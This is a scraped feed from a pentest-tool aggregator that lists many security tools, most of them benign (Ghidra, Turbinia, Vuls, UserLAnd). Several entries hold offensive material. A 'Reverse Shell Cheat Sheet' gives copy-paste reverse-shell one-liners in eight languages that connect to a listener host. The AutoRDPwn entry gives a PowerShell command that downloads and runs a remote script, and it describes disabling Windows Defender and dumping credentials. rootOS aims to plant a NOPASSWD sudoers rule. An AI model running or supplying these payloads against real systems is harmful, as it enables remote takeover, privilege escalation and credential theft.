Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5837 articles
Browse latest View live

Cuteit v0.2.1 - IP Obfuscator Made To Make A Malicious Ip A Bit Cuter

$
0
0

IP obfuscator made to make a malicious ip a bit cuter
A simple python tool to help you to social engineer, bypass whitelisting firewalls, potentially break regex rules for command line logging looking for IP addresses and obfuscate cleartext strings to C2 locations within the payload.
All of that is simply done with obfuscating ip to many forms.

Usage
usage: Cuteit.py [-h] [--disable-coloring] ip

positional arguments:
ip IP you want to convert

optional arguments:
-h, --help show this help message and exit
--disable-coloring Disable colored printing

Screenshot



Using it as a module!
You can use this script as a module in your python scripts as follows:
import Cuteit
convert = Cuteit.lib(ip)
print(convert.hex)
and the photo bellow shows that in action:




UserLAnd - The Easiest Way To Run A Linux Distribution or Application on Android

$
0
0

The easiest way to run a Linux distribution or application on Android.
Features:
  • Run full linux distros or specific applications on top of Android.
  • Install and uninstall like a regular app.
  • No root required.

Start using UserLAnd
There are two ways to use UserLAnd: single-click apps and user-defined custom sessions.

Using single-click apps:

  1. Click an app.
  2. Fill out the required information.
  3. You're good to go!

Using user-defined custom sessions:

  1. Define a session - This describes what filesystem you are going to use, and what kind of service you want to use when connecting to it (ssh or vnc).
  2. Define a filesystem - This describes what distribution of Linux you want to install.
  3. Once defined, just tap on the session to start up. This will download necessary assets, setup the filesystem, start the server, and connect to it. This will take several minutes for the first start up, but will be quicker afterwards.

Managing Packages

Debian, Ubuntu, And Kali:
-> Update: sudo apt-get update && sudo apt-get dist-upgrade
-> Install Packages: sudo apt-get install <package name>
-> Remove Packages: sudo apt-get remove <package name>
Archlinux:
-> Update: sudo pacman -Syu
-> Install Packages: sudo pacman -S <package name>
-> Remove Packages: sudo pacman -R <package name>

Installing A Desktop

Debian, Ubuntu, And Kali:
-> Install Lxde: sudo apt-get install lxde (default desktop)
-> Install X Server Client: Download on the Play store
-> Launch XSDL
-> In UserLAnd Type: export DISPLAY=:0 PULSE_SERVER=tcp:127.0.0.1:<PORT NUMBER>
-> Then Type: startlxde
-> Then Go Back To XSDL And The Desktop Will Show Up
ArchLinux:
-> Install Lxde: sudo pacman -S lxde
-> Install X Server Client: Download on the Play store
-> Launch XSDL
-> In UserLAnd Type: export DISPLAY=:0 PULSE_SERVER=tcp:127.0.0.1:<PORT NUMBER>
-> Then Type: startlxde
-> Then Go Back To XSDL And The Desktop Will Show Up


But you can do so much more than that. Your phone isn't just a play thing any more!
 
Have a bug report or a feature request?
You can see the templates by visiting the issue center.
You can also chat on slack.

Want to contribute?
See CONTRIBUTING document.


Reload.sh - Reinstall, Restore And Wipe Your System Via SSH, Without Rebooting

$
0
0

Reinstall, restore and wipe your system from the level and in the place of the running GNU/Linux distribution (without cd-rom, flash and other). Via SSH, without rebooting.



How it works?
Set your archive with system backup to restore:
_build="/mnt/system-backup.tgz"
Set path to temporary system (optional):
_base="/mnt/minimal-base"
If you do not specify this parameter, the temporary system will be downloaded automatically.
Set path to main system disk:
_disk="/dev/vda"
Run reload.sh:
./bin/reload.sh --base "$_base" --build "$_build" --disk "$_disk"

Contributions
Suggestions and pull requests are welcome. See also this.

See also


Legion - An Easy-To-Use, Super-Extensible And Semi-Automated Network Penetration Testing Tool That Aids In Discovery, Reconnaissance And Exploitation Of Information Systems

$
0
0

Legion, a fork of SECFORCE's Sparta, is an open source, easy-to-use, super-extensible and semi-automated network penetration testing framework that aids in discovery, reconnaissance and exploitation of information systems. Legion is developed and maintained by GoVanguard. More information about Legion, including the product roadmap, can be found on it's product page at https://GoVanguard.io/legion.

FEATURES
  • Automatic recon and scanning with NMAP, whataweb, nikto, Vulners, Hydra, SMBenum, dirbuster, sslyzer, webslayer and more (with almost 100 auto-scheduled scripts)
  • Easy to use graphical interface with rich context menus and panels that allow pentesters to quickly find and exploit attack vectors on hosts
  • Modular functionality allows users to easily customize Legion and automatically call their own scripts/tools
  • Highly customizable stage scanning for ninja-like IPS evasion
  • Automatic detection of CPEs (Common Platform Enumeration) and CVEs (Common Vulnerabilities and Exposures)
  • Realtime autosaving of project results and tasks

NOTABLE CHANGES FROM SPARTA
  • Refactored from Python 2.7 to Python 3.6 and the elimination of depreciated and unmaintained libraries
  • Upgraded to PyQT5, increased responsiveness, less buggy, more intuitive GUI that includes features like:
    • Task completion estimates
    • 1-Click scan lists of ips, hostnames and CIDR subnets
    • Ability to purge results, rescan hosts and delete hosts
    • Granual NMAP scanning options
  • Support for hostname resolution and scanning of vhosts/sni hosts
  • Revise process queuing and execution routines for increased app reliability and performance
  • Simplification of installation with dependency resolution and installation routines
  • Realtime project autosaving so in the event some goes wrong, you will not loose any progress!
  • Docker container deployment option
  • Supported by a highly active development team

GIF DEMO


INSTALLATION

TRADITIONAL METHOD
Assumes Ubuntu, Kali or Parrot Linux is being used with Python 3.6 installed. Other dependencies should automatically be installed. Within Terminal:
git clone https://github.com/GoVanguard/legion.git
cd legion
sudo chmod +x startLegion.sh
sudo ./startLegion.sh

DOCKER METHOD
Assumes Docker and Xauthority are installed. Within Terminal:
git clone https://github.com/GoVanguard/legion.git
cd legion/docker
sudo chmod +x runIt.sh
sudo ./runIt.sh

ATTRIBUTION
  • Refactored Python 3.6+ codebase, added feature set and ongoing development of Legion is credited to GoVanguard
  • The initial Sparta Python 2.7 codebase and application design is credited SECFORCE.
  • Several additional PortActions, PortTerminalActions and SchedulerSettings are credited to batmancrew.
  • The nmap XML output parsing engine was largely based on code by yunshu, modified by ketchup and modified SECFORCE.
  • ms08-067_check script used by smbenum.sh is credited to Bernardo Damele A.G.
  • Legion relies heavily on nmap, hydra, python, PyQt, SQLAlchemy and many other tools and technologies so we would like to thank all of the people involved in the creation of those.


Ghidra - Software Reverse Engineering Framework

$
0
0

Ghidra is a software reverse engineering (SRE) framework created and maintained by the National Security Agency Research Directorate. This framework includes a suite of full-featured, high-end software analysis tools that enable users to analyze compiled code on a variety of platforms including Windows, Mac OS, and Linux. Capabilities include disassembly, assembly, decompilation, graphing, and scripting, along with hundreds of other features. Ghidra supports a wide variety of process instruction sets and executable formats and can be run in both user-interactive and automated modes. Users may also develop their own Ghidra plug-in components and/or scripts using Java or Python.
In support of NSA's Cybersecurity mission, Ghidra was built to solve scaling and teaming problems on complex SRE efforts, and to provide a customizable and extensible SRE research platform. NSA has applied Ghidra SRE capabilities to a variety of problems that involve analyzing malicious code and generating deep insights for SRE analysts who seek a better understanding of potential vulnerabilities in networks and systems.
This repository is a placeholder for the full open source release. Be assured efforts are under way to make the software available here. In the meantime, enjoy using Ghidra on your SRE efforts, developing your own scripts and plugins, and perusing the over a million lines of Java and Sleigh code released within the initial public release. The release can be downloaded from our project homepage.

Demo



Turbinia - Automation And Scaling Of Digital Forensics Tools

$
0
0

Turbinia is an open-source framework for deploying, managing, and running distributedforensic workloads. It is intended to automate running of common forensic processing tools (i.e. Plaso, TSK, strings, etc) to help with processing evidence in the Cloud, scaling the processing of large amounts of evidence, and decreasing response time by parallelizing processing where possible.

How it works
Turbinia is composed of different components for the client, server and the workers. These components can be run in the Cloud, on local machines, or as a hybrid of both. The Turbinia client makes requests to process evidence to the Turbinia server. The Turbinia server creates logical jobs from these incoming user requests, which creates and schedules forensic processing tasks to be run by the workers. The evidence to be processed will be split up by the jobs when possible, and many tasks can be created in order to process the evidence in parallel. One or more workers run continuously to process tasks from the server. Any new evidence created or discovered by the tasks will be fed back into Turbinia for further processing.
Communication from the client to the server is currently done with either Google Cloud PubSub or Kombu messaging. The worker implementation can use either PSQ (a Google Cloud PubSub Task Queue) or Celery for task scheduling.
More information on Turbinia and how it works can be found here.

Status
Turbinia is currently in Alpha release.

Installation
There is an rough installation guide here.

Usage
The basic steps to get things running after the initial installation and configuration are:
  • Start Turbinia server component with turbiniactl server command
  • Start one or more Turbinia workers with turbiniactl psqworker
  • Send evidence to be processed from the turbinia client with turbiniactl ${evidencetype}
  • Check status of running tasks with turbiniactl status
turbiniactl can be used to start the different components, and here is the basic usage:
$ turbiniactl --help
usage: turbiniactl [-h] [-q] [-v] [-d] [-a] [-f] [-o OUTPUT_DIR] [-L LOG_FILE]
[-r REQUEST_ID] [-R] [-S] [-C] [-V] [-D]
[-F FILTER_PATTERNS_FILE] [-j JOBS_WHITELIST]
[-J JOBS_BLACKLIST] [-p POLL_INTERVAL] [-t TASK] [-w]
<command> ...

optional arguments:
-h, --help show this help message and exit
-q, --quiet Show minimal output
-v, --verbose Show verbose output
-d, --debug Show debug output
-a, --all_fields Show all task status fields in output
-f, --force_evidence Force evidence processing request in potentially
unsafe conditions
-o OUTPUT_DIR, --output_dir OUTPUT_DIR
Directory path for output
-L LOG_FILE, --log_file LOG_FILE
Log file
-r REQUEST_ID, --request_id REQUEST_ID
Create new requests with this Request ID
-R, --run_local Run completely locally without any server or other
infrastructure. This can be used to run one-off Tasks
to process data locally.
-S, --server Run Turbinia Server indefinitely
-C, --use_celery Pass this flag when using Celery/Kombu for task
queuing and messaging (instead of Google PSQ/pubsub)
-V, --version Show the version
-D, --dump_json Dump JSON output of Turbinia Request instead of
sending it
-F FILTER_PATTERNS_FILE, --filter_patterns_file FILTER_PATTERNS_FILE
A file containing newline separated string patterns to
filter text based evidence files with (in extended
grep regex format). This filtered output will be in
addition to the complete output
-j JOBS_WHITELIST, --jobs_whitelist JOBS_WHITELIST
A whitelist for Jobs that we will allow to run (note
that it will not force them to run).
-J JOBS_BLACKLIST, --jobs_blacklist JOBS_BLACKLIST
A blacklist for Jobs we will not allow to run
-p POLL_INTERVAL, --poll_interval POLL_INTERVAL
Number of seconds to wait between polling for task
state info
-t TASK, --task TASK The name of a single Task to run locally (must be used
with --run_local.
-w, --wait Wait to exit until all tasks for the given request
have completed

Commands:
<command>
rawdisk Process RawDisk as Evidence
googleclouddisk Process Google Cloud Persistent Disk as Evidence
googleclouddiskembedded
Process Google Cloud Persistent Disk with an embedded
raw disk image as Evidence
directory Process a directory as Evidence
listjobs List all available jobs
psqworker Run PSQ worker
celeryworker Run Celery worker
status Get Turbinia Task status
server Run Turbinia Server
The commands for processing the evidence types of rawdisk and directory specify information about evidence that Turbinia should process. By default, when adding new evidence to be processed, turbiniactl will act as a client and send a request to the configured Turbinia server, otherwise if --server is specified, it will start up its own Turbinia server process. Here's the turbiniactl usage for adding a raw disk type of evidence to be processed by Turbinia:
$ ./turbiniactl rawdisk -h
usage: turbiniactl rawdisk [-h] -l LOCAL_PATH [-s SOURCE] [-n NAME]

optional arguments:
-h, --help show this help message and exit
-l LOCAL_PATH, --local_path LOCAL_PATH
Local path to the evidence
-s SOURCE, --source SOURCE
Description of the source of the evidence
-n NAME, --name NAME Descriptive name of the evidence

Other documentation

Notes
  • Turbinia currently assumes that Evidence is equally available to all worker nodes (e.g. through locally mapped storage, or through attachable persistent Google Cloud Disks, etc).
  • Not all evidence types are supported yet
  • Still only a small number of processing job types supported, but more are being developed.

Obligatory Fine Print
This is not an official Google product (experimental or otherwise), it is just code that happens to be owned by Google.


Chomp Scan - A Scripted Pipeline Of Tools To Streamline The Bug Bounty/Penetration Test Reconnaissance Phase

$
0
0

A scripted pipeline of tools to simplify the bug bounty/penetration test reconnaissance phase, so you can focus on chomping bugs.

Scope
Chomp Scan is a Bash script that chains together the fastest and most effective tools (in my opinion/experience) for doing the long and sometimes tedious process of recon. No more looking for word lists and trying to remember when you started a scan and where the output is. Chomp Scan creates a timestamped output directory based on the search domain, e.g. example.com-21:38:15, and puts all tool output there, split into individual sub-directories as appropriate. Custom output directories are also supported via the -o flag.
New: Chomp Scan now integrates Notica, which allows you to receive a notification when the script finishes. Simply visit Notica and get a unique URL parameter. Simply pass the parameter to Chomp Scan via the -n flag, keep the Notica page open in a browser tab on your computer or phone, and you will receive a message when Chomp Scan has finished running. No more constantly checking/forgetting to check those long running scans.
Chomp Scan runs in multiple modes. The primary one is using command-line arguments to select which scanning phases to use, which wordlists, etc. A guided interactive mode is available, as well as a non-interactive mode, useful if you do not want to deal with setting multiple arguments.
A list of interesting words is included, such as dev, test, uat, staging, etc., and domains containing those terms are flagged. This way you can focus on the interesting domains first if you wish. This list can be customized to suit your own needs, or replaced with a different file via the -X flag.
A blacklist file is included, to exclude certain domains from the results. However it does not prevent those domains from being resolved, only from being used for port scanning and content discovery. It can be passed via the -b flag.
Chomp Scan supports limited canceling/skipping of tools by pressing Ctrl-c. This can sometimes have unintended side effects, so use with care.
Note: Chomp Scan is in active development, and new/different tools will be added as I come across them. Pull requests and comments welcome!

Scanning Phases

Subdomain Discovery (3 different sized wordlists)
  • dnscan
  • subfinder
  • sublist3r
  • massdns + altdns

Screenshots (optional)
  • aquatone

Port Scanning (optional)

Information Gathering (optional) (4 different sized wordlists)
  • subjack
  • bfac
  • whatweb
  • wafw00f
  • nikto

Content Discovery (optional) (4 different sized wordlists)
  • ffuf
  • gobuster
  • dirsearch

Wordlists
A variety of wordlists are used, both for subdomain bruteforcing and content discovery. Daniel Miessler's Seclists are used heavily, as well as Jason Haddix's lists. Different wordlists can be used by passing in a custom wordlist or using one of the built-in named argument lists below.

Subdomain Bruteforcing
Argument NameFilenameWord CountDescription
shortsubdomains-top1mil-20000.txt22kFrom Seclists
longsortedcombined-knock-dnsrecon-fierce-reconng.txt102kFrom Seclists
hugehuge-200k.txt199kCombination I made of various wordlists, including Seclists

Content Discovery
Argument NameFilenameWord CountDescription
smallbig.txt20kFrom Seclists
mediumraft-large-combined.txt167kCombination of the raft wordlists in Seclists
largeseclists-combined.txt215kLarger combination of all the Discovery/DNS lists in Seclists
xlhaddix_content_discovery_all.txt373kJason Haddix's all content discovery list
xxlhaddix-seclists-combined.txt486kCombination of the two previous lists

Misc.
  • altdns-words.txt - 240 words - Used for creating domain permutations for masscan to resolve. Borrowed from altdns.
  • interesting.txt - 43 words - A list I created of potentially interesting words appearing in domain names. Provide your own interesting words list with the -X flag.

Installation
Clone this repo and run the installer.sh script. Make sure to source ~/.profile after running the installer in order to add the Go binary path to your $PATH variable. Then run Chomp Scan.

Usage
Chomp Scan always runs subdomain enumeration, thus a domain is required via the -u flag. The domain should not contain a scheme, e.g. http:// or https://. By default, HTTPS is always used. This can be changed to HTTP by passing the -H flag. A wordlist is optional, and if one is not provided the built-in short list (20k words) is used.
Other scan phases are optional. Content discovery can take an optional wordlist, otherwise it defaults to the built-in short (22k words) list.
The final results of the scan are stored in two text files in the output directory. All unique domains that are found are stored in all_discovered_domains.txt, and all unique IPs that are discovered are stored in all_discovered_ips.txt.
chomp-scan.sh -u example.com -a d short -cC large -p -o path/to/directory

Usage of Chomp Scan:
-u domain
(required) Domain name to scan. This should not include a scheme, e.g. https:// or http://.
-d wordlist
(optional) The wordlist to use for subdomain enumeration. Three built-in lists, short, long, and huge can be used, as well as the path to a custom wordlist. The default is short.
-c
(optional) Enable content discovery phase. The wordlist for this option defaults to short if not provided.
-C wordlist
(optional) The wordlist to use for content discovery. Five built-in lists, small, medium, large, xl, and xxl can be used, as well as the path to a custom wordlist. The default is small.
-s
(optional) Enable screenshots using Aquatone.
-i
(optional) Enable information gathering phase, using subjack, bfac, whatweb, wafw00f, and nikto.
-p
(optional) Enable portscanning phase, using masscan (run as root) and nmap.
-I
(optional) Enable interactive mode. This allows you to select certain tool options and inputs interactively. This cannot be run with -D.
-D
(optional) Enable default non-interactive mode. This mode uses pre-selected defaults and requires no user interaction or options. This cannot be run with -I.
Options: Subdomain enumeration wordlist: short.
Content discovery wordlist: small.
Aquatone screenshots: yes.
Portscanning: yes.
Information gathering: yes.
Domains to scan: all unique discovered.
-b wordlist
(optional) Set custom domain blacklist file.
-X wordlist
(optional) Set custom interesting word list.
-o directory
(optional) Set custom output directory. It must exist and be writable.
-a
(optional) Use all unique discovered domains for scans, rather than interesting domains. This cannot be used with -A.
-A
(optional, default) Use only interesting discovered domains for scans, rather than all discovered domains. This cannot be used with -a.
-H
(optional) Use HTTP for connecting to sites instead of HTTPS.
-h
(optional) Display this help page.

In The Future
Chomp Scan is still in active development, as I use it myself for bug hunting, so I intend to continue adding new features and tools as I come across them. New tool suggestions, feedback, and pull requests are all welcomed. Here is a short list of potential additions I'm considering:
  • Adding a config file, for more granular customization of tools and parameters
  • Adding testing/support for Ubuntu/Debian
  • A possible Python re-write (and maybe a Go re-write after that!)
  • The generation of an HTML report, similar to what aquatone provides

Examples








Goca Scanner - FOCA fork written in Go

$
0
0

Goca is a FOCA fork written in Go, which is a tool used mainly to find metadata and hidden information in the documents its scans. These documents may be on web pages, and can be downloaded and analyzed with Goca.
It is capable of analyzing a wide variety of documents, with the most common being Microsoft Office, Open Office, or PDF files, although it also analyzes Adobe InDesign or SVG files, for instance.

These documents are searched for using search engines such as:
  • Google
  • Bing
  • DuckDuckGo
  • Yahoo
  • Ask
Then downloads the documents and extracts the EXIF information from graphic files, and a complete analysis of the information discovered through the URL is conducted even before downloading the file.

USAGE
Download built packages from Releases
To build from source, you will need Go installed.
$ export GO111MODULE=on 
$ go get ./...
$ go run goca/goca.go -h
To run Goca from Docker:
$ docker build -t gocaio/goca /path/to/goca
$ docker run gocaio/goca -h

Contributing Guide
Please reade the Contributing guide:

Documentation
Refer to the Official Doc.



Cat-Nip - Automated Basic Pentest Tool (Designed For Kali Linux)

$
0
0

Cat-Nip Automated Basic Pentest Tool

this tool will make your basic pentesting task like Information Gathering, Auditing, And Reporting so this tool will do every task fully automatic.

Usage Guide
Download / Clone Cat-Nip
~# git clone https://github.com/baguswiratmaadi/catnip
Go Inside Cat-Nip Dir
~# cd catnip
Give Permission To Cat-Nip
~# chmod 777 catnip.sh
Run Cat-Nip
~# ./catnip.sh

Changelog
  • 1.0 First Release

Pentest Tools Auto Executed With Cat-Nip
  • Whois Lookup
  • DNSmap
  • Nmap
  • Dmitry
  • Theharvester
  • Load Balancing Detector
  • SSLyze
  • Automater
  • Ua Tester
  • Gobuster
  • Grabber
  • Parsero
  • Uniscan
  • And More Tool Soon

Screenshot
this is preview Cat-Nip

Tools Preview



Output Result



Report In HTML




Disclaimer
  • Do not scan government and private IT objects without legal permission.
  • Do At Your Own Risk

AutoRDPwn v4.8 - The Shadow Attack Framework

$
0
0

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim's desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.

Requirements
Powershell 4.0 or higher

Changes

Version 4.8
• Compatibility with Powershell 4.0
• Automatic copy of the content to the clipboard (passwords, hashes, dumps, etc.)
• Automatic exclusion in Windows Defender (4 different methods)
• Remote execution without password for PSexec, WMI and Invoke-Command
• New available attack: DCOM Passwordless Execution
• New available module: Remote Access / Metasploit Web Delivery
• New module available: Remote VNC Server (designed for legacy environments)
• Autocomplete the host, user and password fields by pressing Enter
• It is now possible to run the tool without administrator privileges with the -noadmin parameter
*The rest of the changes can be consulted in the CHANGELOG file

Use
This application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords, obtain a remote shell, upload and download files or even recover the history of RDP connections or passwords of wireless networks.
One line execution:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Screenshots



Credits and Acknowledgments
Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
HarmJ0y & Matt Graeber for his script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell
Stas'M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap
Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash
Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz
Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0m

Contact
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can contact through info@darkbyte.net


rootOS - macOS Root Helper

$
0
0

Tries to use various CVEs to gain sudo or root access. All exploits have an end goal of adding ALL ALL=(ALL) NOPASSWD: ALL to /etc/sudoers allowing any user to run sudo commands.

Exploits
  • CVE-2008-2830
  • CVE-2015-3760
  • CVE-2015-5889
  • CVE-2017-13872
  • AppleScript Dynamic Phishing
  • Sudo Piggyback Link

Run
python root.py


Vuls - Vulnerability Scanner For Linux/FreeBSD, Agentless, Written In Go

$
0
0

Vulnerability scanner for Linux/FreeBSD, agentless, written in golang.
Twitter: @vuls_en




DEMO


Abstract
For a system administrator, having to perform security vulnerability analysis and software update on a daily basis can be a burden. To avoid downtime in production environment, it is common for system administrator to choose not to use the automatic update option provided by package manager and to perform update manually. This leads to the following problems.
  • System administrator will have to constantly watch out for any new vulnerabilities in NVD(National Vulnerability Database) or similar databases.
  • It might be impossible for the system administrator to monitor all the software if there are a large number of software installed in server.
  • It is expensive to perform analysis to determine the servers affected by new vulnerabilities. The possibility of overlooking a server or two during analysis is there.
Vuls is a tool created to solve the problems listed above. It has the following characteristics.
  • Informs users of the vulnerabilities that are related to the system.
  • Informs users of the servers that are affected.
  • Vulnerability detection is done automatically to prevent any oversight.
  • Report is generated on regular basis using CRON or other methods. to manage vulnerability.

Main Features

Scan for any vulnerabilities in Linux/FreeBSD Server
Supports major Linux/FreeBSD
  • Alpine, Ubuntu, Debian, CentOS, Amazon Linux, RHEL, Oracle Linux, SUSE Enterprise Linux and Raspbian, FreeBSD
  • Cloud, on-premise, Docker

High quality scan
Vuls uses Multiple vulnerability databases

Fast scan and Deep scan
Fast Scan
  • Scan without root privilege, no dependencies
  • Almost no load on the scan target server
  • Offline mode scan with no internet access. (Red Hat, CentOS, OracleLinux, Ubuntu, Debian)
Fast Root Scan
  • Scan with root privilege
  • Almost no load on the scan target server
  • Detect processes affected by update using yum-ps (RedHat, CentOS, Oracle Linux and Amazon Linux)
  • Detect processes which updated before but not restarting yet using checkrestart of debian-goodies (Debian and Ubuntu)
  • Offline mode scan with no internet access. (RedHat, CentOS, OracleLinux, Ubuntu, Debian)
Deep Scan
  • Scan with root privilege
  • Parses the Changelog
    Changelog has a history of version changes. When a security issue is fixed, the relevant CVE ID is listed. By parsing the changelog and analysing the updates between the installed version of software on the server and the newest version of that software it's possible to create a list of all vulnerabilities that need to be fixed.
  • Sometimes load on the scan target server

Remote scan and Local scan
Remote Scan
  • User is required to only setup one machine that is connected to other target servers via SSH
Local Scan
  • If you don't want the central Vuls server to connect to each server by SSH, you can use Vuls in the Local Scan mode.

Dynamic Analysis
  • It is possible to acquire the state of the server by connecting via SSH and executing the command.
  • Vuls warns when the scan target server was updated the kernel etc. but not restarting it.

Scan middleware that are not included in OS package management
  • Scan middleware, programming language libraries and framework for vulnerability
  • Support software registered in CPE

MISC
  • Nondestructive testing
  • Pre-authorization is NOT necessary before scanning on AWS
    • Vuls works well with Continuous Integration since tests can be run every day. This allows you to find vulnerabilities very quickly.
  • Auto generation of configuration file template
    • Auto detection of servers set using CIDR, generate configuration file template
  • Email and Slack notification is possible (supports Japanese language)
  • Scan result is viewable on accessory software, TUI Viewer on terminal or Web UI (VulsRepo).

What Vuls Doesn't Do

Authors
kotakanbe (@kotakanbe) created vuls and these fine people have contributed.

Change Log
Please see CHANGELOG.


Reverse Shell Cheat Sheet

$
0
0

If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.
If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port. This page deals with the former.

Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared.
The examples shown are tailored to Unix-like systems. Some of the examples below should also work on Windows if you use substitute “/bin/sh -i” with “cmd.exe”.
Each of the methods below is aimed to be a one-liner that you can copy/paste. As such they’re quite short lines, but not very readable.

Php :
php -r '$sock=fsockopen("192.168.0.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Python :
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bash :
bash -i >& /dev/tcp/192.168.0.5/4444 0>&1

Netcat :
nc -e /bin/sh 192.168.0.5 4444

Perl :
perl -e 'use Socket;$i="192.168.0.5";$p=4545;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby :
ruby -rsocket -e'f=TCPSocket.open("192.168.0.5",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java :
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.5/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

xterm :
xterm -display 192.168.0.5:4444


Kage - Graphical User Interface For Metasploit Meterpreter And Session Handler

$
0
0

Kage (ka-geh) is a tool inspired by AhMyth designed for Metasploit RPC Server to interact with meterpreter sessions and generate payloads.
For now it only supports windows/meterpreter& android/meterpreter

Getting Started
Please follow these instructions to get a copy of Kage running on your local machine without any problems.

Prerequisites

Installing
You can install Kage binaries from here.

for developers
to run the app from source code:
# Download source code
git clone https://github.com/WayzDev/Kage.git

# Install dependencies and run kage
cd Kage
yarn # or npm install
yarn run dev # or npm run dev

# to build project
yarn run build
electron-vue officially recommends the yarn package manager as it handles dependencies much better and can help reduce final build size with yarn clean.

Screenshots






Video Tutorial


Contact
Twitter: @iFalah
Email: ifalah@protonmail.com

Credits
Metasploit Framework - (c) Rapid7 Inc. 2012 (BSD License)
http://www.metasploit.com/
node-msfrpcd - (c) Tomas Gonzalez Vivo. 2017 (Apache License)
https://github.com/tomasgvivo/node-msfrpc
electron-vue - (c) Greg Holguin. 2016 (MIT)
https://github.com/SimulatedGREG/electron-vue

This project was generated with electron-vue@8fae476 using vue-cli. Documentation about the original structure can be found here.


Acunetix Web Application Vulnerability Report 2019

$
0
0

Acunetix compiles an annual web application vulnerability report. The purpose of this report is to provide security experts and interested parties with an analysis of data on vulnerabilities gathered over the previous year. The 2019 report contains the results and analysis of vulnerabilities, detected from the automated web and network perimeter scans run on the Acunetix Online platform, over a 12 month period, across more than 10,000 scan targets. It was found that as many as 46% of websites contain high severity vulnerabilities with 87% of websites containing medium severity vulnerabilities. Although SQL Injection vulnerabilities are on the slight decline, XSS vulnerabilities, vulnerable JavaScript libraries, and WordPress related issues were found to each claim a significant 30% of the sampled targets.

The Web Application Vulnerability Report 2019 contains vital security information on:
  • Which vulnerabilities are rising and falling in frequency
  • Current security concerns, such as the increasing complexity of new apps, the accelerating rate of new versions, and the problem of scale
  • Changes in threat landscape from both the client and server sides
  • The four major stages of vulnerability analysis
  • Vulnerability findings by type and severity
  • An analysis of each discovered vulnerability in terms of how it works, its statistical status and pointers for remediation.
The report concludes that web application vulnerabilities are a major threat to the security of all organizations, regardless of their size, location, or the security steps they’ve taken. Automated and integrated web application security scanning must become an integral part of the development process.






IoT-Home-Guard - A Tool For Malicious Behavior Detection In IoT Devices

$
0
0
IoT-Home-Guard is a project to help people discover malware in smart home devices.
For users the project can help to detect compromised smart home devices. For security researchers it is also useful in network analysis and malicious hehaviors detection.
In July 2018 we had completed the first version. We will complete the second version by October 2018 with improvement of user experience and increased number of identifiable devices.
The first generation is a hardware device based on Raspberry Pi with wireless network interface controllers. We will customize new hardware in the second generation. The system can be set up with software part in laptops after essential environment configuration. Software part is available in software_tools/.

Proof of principle
Our approach is based on the detection of malicious network traffic. A device implanted malwares will communicate with remote server, trigger a remote shell or send audios/videos to server.
The chart below shows the network traffic of a device which implanted snooping malwares.
Red line : traffic between devices and a remote spy server.
Green line : normal traffic of devices.
Black line : Sum of TCP traffic.


Modules
  1. AP module and Data flow catcher: Catch network traffic.
  2. Traffic analying engine: Extract characteristics from network traffic and compare them with device fingerprint database.
  3. Device fingerprint database: Normal network behaviors of each devices, based on whitelist. Call APIs of 360 threat intelligence database (https://ti.360.net/).
  4. Web server: There may be a web server in the second generation.

Procedure
                                           ___________________       ___________________
| | | |
| data_flow_catcher |<----| devices connected |
|___________________| |___________________|
¦
¦
____________________________ ____↓________________
| | | |
| device_fingerprint_databse |<---------> | flow_analyze_engine |
|____________________________| ¦ |_____________________|
¦ ↑
¦ ¦
__________________________________ ¦ ____↓_______ _________________
| | ¦ | | | |
| 360 threat intelligence database |<- | web_server |<-----------| user interfaces |
|__________________________________| |____________| |_________________|
The tool works as an Access Point, connected manually by devices under test, sends network traffic to traffic analyzing engine for characteristic extraction. Traffic analyzing engine compares characteristics with entries in device fingerprint database to recognize device type and suspicious network connection. Device fingerprint database is a collect of normal behaviors of each device based on whitelist. Additionally, characteristics will be searched on threat intelligence database of Qihoo 360 to identify malicious behaviors. A web server is set up as user interfaces.

Effectiveness
In our research, we have succcessfully implanted Trojans in eight devices including smart speakers, cameras, driving recorders and mobile translators with IoT-Implant-Toolkit.
A demo video below:



We collected characteristics of those devices and ran IoT-Home-Guard. All devices implanted Trojans have been detected. We believe that malicious behaviors of more devices can be identified with high accuracy after supplement of fingerprint database.


Hostintel - A Modular Python Application To Collect Intelligence For Malicious Hosts

$
0
0

This tool is used to collect various intelligence sources for hosts. Hostintel is written in a modular fashion so new intelligence sources can be easily added.
